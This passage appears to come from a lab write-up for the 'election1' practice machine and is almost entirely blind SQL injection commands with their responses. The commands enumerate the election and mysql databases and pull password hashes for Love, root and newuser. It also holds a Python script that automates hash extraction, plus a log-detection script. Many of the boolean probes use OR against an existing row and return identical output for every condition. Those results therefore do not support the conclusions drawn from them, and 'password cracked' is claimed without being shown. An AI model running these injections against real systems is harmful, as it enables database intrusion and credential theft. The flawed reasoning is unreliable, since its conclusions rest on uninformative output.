{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	13%

COUNT(table_name)=8 holds, so the election DB has 8 tables in total.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name LIKE "tb%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_panitia") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

election.tb_panitia table identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_pengaturan") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

election.tb_pengaturan table identified.

election.tb_panitia Table (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia")=5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

COUNT(column_name)=5 holds, so election.tb_panitia has 5 columns in total.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "passwo%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="password") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%

election.tb_panitia.password column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "nam%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"    
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="nama") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

election.tb_panitia.nama column identified.

election.tb_panitia Credential Exfiltration (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama LIKE "L%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	15%

The Love user is present in election.tb_panitia.nama.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND LENGTH(password)=32) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.00s
sys	0.00s
cpu	15%

The Love user's password field is 32 characters long, consistent with an unsalted MD5 hash.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password LIKE "bb113886b0513a9d%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password="bb113886b0513a9d882e3caa5cd73314") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

The password hash of the Love user is bb113886b0513a9d882e3caa5cd73314, matching the UNION result. The plaintext password of the Love account was already disclosed in the card.php file.
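The manual prefix probing above (LENGTH() first, then LIKE 'prefix%' one character at a time) is the part worth automating, since a 32-character hash takes up to 512 requests by hand. The following is an added example, not part of the original write-up: the oracle is a SQLite stand-in for op_kandidat.php whose query shape (SELECT ... FROM tb_kandidat WHERE id=<id>) and "row returned = 200, no row = 404" behaviour are assumptions reconstructed from the responses on this page; the Love row and its hash are the values shown above, and the SQL literals use single quotes because no shell quoting is involved. Against the real target the oracle function would send the same curl request and return whether "code":"200" came back. It uses AND with the existing id rather than OR, so a false condition removes the base row, and it starts with the negative control discussed earlier.

```python
"""Boolean-blind prefix extraction (added example). The oracle is a SQLite
stand-in for the op_kandidat.php fetch action; the query shape and the
row/no-row response rule are assumptions, the data is what the write-up
shows."""
import sqlite3
from typing import Callable

Oracle = Callable[[str], bool]   # takes the injected id value, True iff a row came back


def make_oracle() -> Oracle:
    """Constructed target: the candidate row used as base id and the committee table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tb_kandidat (id INTEGER, nama TEXT);
        INSERT INTO tb_kandidat VALUES (1, 'Love');
        CREATE TABLE tb_panitia (id INTEGER, nama TEXT, password TEXT);
        INSERT INTO tb_panitia VALUES (1, 'Love', 'bb113886b0513a9d882e3caa5cd73314');
    """)

    def oracle(injected_id: str) -> bool:
        # The injection point: the id value is concatenated into the SQL text.
        sql = f"SELECT nama FROM tb_kandidat WHERE id = {injected_id}"
        return len(conn.execute(sql).fetchall()) == 1
    return oracle


def check_oracle(oracle: Oracle, base_id: str = "1") -> None:
    """Negative control: a known-true and a known-false condition must differ,
    otherwise the channel carries no information at all."""
    if not oracle(f"{base_id} AND 1=1 -- -") or oracle(f"{base_id} AND 1=2 -- -"):
        raise RuntimeError("oracle is not discriminating; check base id and response handling")


def find_length(oracle: Oracle, length_expr: str, hi: int = 256, base_id: str = "1") -> int:
    """Binary search on LENGTH(): about eight requests instead of one per candidate length."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{base_id} AND ({length_expr}) > {mid} -- -"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle: Oracle, prefix_cond: Callable[[str], str], length: int,
            alphabet: str = "0123456789abcdef", base_id: str = "1") -> str:
    """Grow the known prefix one character per position. LIKE under the default
    MariaDB collation (and SQLite's ASCII LIKE) is case-insensitive, so a lowercase
    hex alphabet also matches an upper-case stored hash; for case-exact data use
    ORD(SUBSTRING(...)) or a BINARY comparison on MariaDB instead."""
    found = ""
    for _ in range(length):
        for ch in alphabet:
            if ch in "%_":   # LIKE wildcards would match anything; escape them or use SUBSTRING
                continue
            if oracle(f"{base_id} AND {prefix_cond(found + ch)} -- -"):
                found += ch
                break
        else:
            raise RuntimeError(f"no character in the alphabet matched at position {len(found)}")
    return found


LOVE_PASSWORD_LENGTH = "SELECT LENGTH(password) FROM tb_panitia WHERE nama='Love'"


def love_password_prefix(prefix: str) -> str:
    """Same condition as the manual probes: true iff the stored hash starts with prefix."""
    return f"(SELECT COUNT(*) FROM tb_panitia WHERE nama='Love' AND password LIKE '{prefix}%')"


def dump_love_hash(oracle: Oracle) -> str:
    check_oracle(oracle)
    n = find_length(oracle, LOVE_PASSWORD_LENGTH)
    return extract(oracle, love_password_prefix, n)


if __name__ == "__main__":
    print(dump_love_hash(make_oracle()))
```

Swapping the alphabet and the prefix condition is all that is needed to pull the mysql.user hashes the same way; for those, a 41-character value starting with * is expected, so the first position resolves to the asterisk before the hex digits begin.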

mysql DB (Boolean-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="mysql")=30 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

COUNT(table_name)=30 holds, so the mysql DB has 30 tables in total.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name LIKE "use%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.07s
user	0.01s
sys	0.00s
cpu	11%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name="user") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

The default mysql.user table.

mysql.user Table (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user")=46 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"         
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.01s
sys	0.00s
cpu	13%

COUNT(column_name)=46 holds, so mysql.user has 46 columns in total.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name LIKE "use%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="user") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%

mysql.user.user column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="password") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE LENGTH(password)=41) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The mysql.user.password column exists and the stored values are 41 characters long: a * prefix followed by 40 hex characters, the mysql_native_password (SHA1(SHA1(password))) format.

mysql.user Credential Exfiltration (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%

The root user is present in mysql.user.user.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.07s
user	0.01s
sys	0.00s
cpu	10%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*9CFBBC772F3F6C%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password="*9CFBBC772F3F6C106020035386DA5BBBF1249A11") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

9CFBBC772F3F6C106020035386DA5BBBF1249A11 is the password hash of the root user. Note the leading * character: it is part of the stored value and marks the 41-character mysql_native_password hash format.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.00s
sys	0.00s
cpu	13%

newuser user identified in the mysql.user.user column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password LIKE "*2470C0C06DEE42FD16%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password="*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	16%

2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 is the password hash of the newuser user. Password cracked.

Time-based Blind


If a boolean-based attack works, a time-based attack inherently works as well: the same boolean condition is wrapped in IF() so that the true branch calls SLEEP(), and the response time becomes the oracle instead of the response body.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo 'SLEEP(2)-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '(CASE WHEN (1=1) THEN SLEEP(2) ELSE 1 END)-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM dual WHERE user() LIKE "new%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM dual WHERE user()="newuser@localhost"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The current user is newuser@localhost. FROM dual refers to a dummy placeholder table and may be omitted.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE database() LIKE "ele%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE database()="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

The current database is election.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE version() LIKE "10%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE version()="10.1.44-MariaDB-0ubuntu0.18.04.1"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF(EXISTS(SELECT 1 FROM dual WHERE database()="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF(EXISTS(SELECT 1 WHERE user()="newuser@localhost"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

An EXISTS clause may also be used instead of COUNT(*), which can be more reliable.
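As an added example, not part of this write-up, the following Python check turns the two oracles used above (boolean-based: response body; time-based: response time) into a detection over web server logs for the op_kandidat.php endpoint: an id parameter that is not an integer or carries SQL tokens, and a request time matching SLEEP(2). It assumes nginx logs $request_time and $request_body (nginx escapes quotes in the body as \x22); the log lines are constructed samples, not real traffic.

```python
import re
from collections import Counter, defaultdict

# nginx combined format plus $request_time and $request_body; nginx escapes a
# double quote inside the body as \x22, so the body field never contains a raw ".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ (?P<rt>\d+\.\d+) "(?P<body>[^"]*)"$')
HEX_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')
ID_RE = re.compile(r'(?:^|&)id=([^&]*)')
# Tokens that have no business inside an integer id parameter.
SQLI_RE = re.compile(
    r'\b(sleep|benchmark|if|union|select|information_schema|mysql\.user)\b|--\s*-',
    re.IGNORECASE)
ENDPOINT = "/election/admin/ajax/op_kandidat.php"

# Constructed sample traffic (not real logs): two benign fetches, one
# boolean-based probe (fast), two true time-based probes (~2 s), one false
# time-based probe (fast), and an unrelated client.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 65 0.052 "aksi=fetch&id=123"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 14 0.048 "aksi=fetch&id=124"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 65 0.051 "aksi=fetch&id=1 OR (SELECT COUNT(*) FROM mysql.user WHERE user=\x22root\x22) -- -"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 14 2.054 "aksi=fetch&id=1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user=\x22root\x22), SLEEP(2), 0) -- -"
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 14 2.061 "aksi=fetch&id=1 OR IF((SELECT COUNT(*) WHERE database()=\x22election\x22), SLEEP(2), 0) -- -"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 14 0.049 "aksi=fetch&id=1 OR IF((SELECT COUNT(*) WHERE database()=\x22other\x22), SLEEP(2), 0) -- -"
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "POST /election/admin/ajax/op_kandidat.php HTTP/1.1" 200 65 0.044 "aksi=fetch&id=7"
'''.strip().splitlines()

def parse(line):
    """One access-log line -> dict, with the nginx \\xHH escapes undone."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    rec["body"] = HEX_ESC_RE.sub(lambda h: chr(int(h.group(1), 16)), rec["body"])
    return rec

def classify(rec, slow_threshold=1.5):
    """Tags for one request: non-integer id, SQL tokens in id, SLEEP()-like delay."""
    tags = set()
    if rec["path"] != ENDPOINT:
        return tags
    m = ID_RE.search(rec["body"])
    val = m.group(1) if m else ""
    if val and not val.isdigit():
        tags.add("nonnumeric_id")
    if SQLI_RE.search(val):
        tags.add("sql_tokens")
    if rec["rt"] >= slow_threshold:
        tags.add("slow")
    return tags

def summarize(lines, slow_threshold=1.5):
    """Per-client tag counts, so a probing sequence stands out from one-offs."""
    counts = defaultdict(Counter)
    for line in lines:
        rec = parse(line)
        if rec:
            counts[rec["ip"]]["requests"] += 1
            counts[rec["ip"]].update(classify(rec, slow_threshold))
    return counts

def suspicious_clients(lines, min_hits=2):
    """Clients that sent at least min_hits injected ids; a 'slow' count beside
    them is the signature of the time-based variant."""
    return sorted(ip for ip, c in summarize(lines).items()
                  if c["nonnumeric_id"] >= min_hits)
```

Server-side, the same integer check on id before the query (a cast, or a typed bound parameter in a prepared statement) removes the injection rather than merely detecting it.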

Databases (Time-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
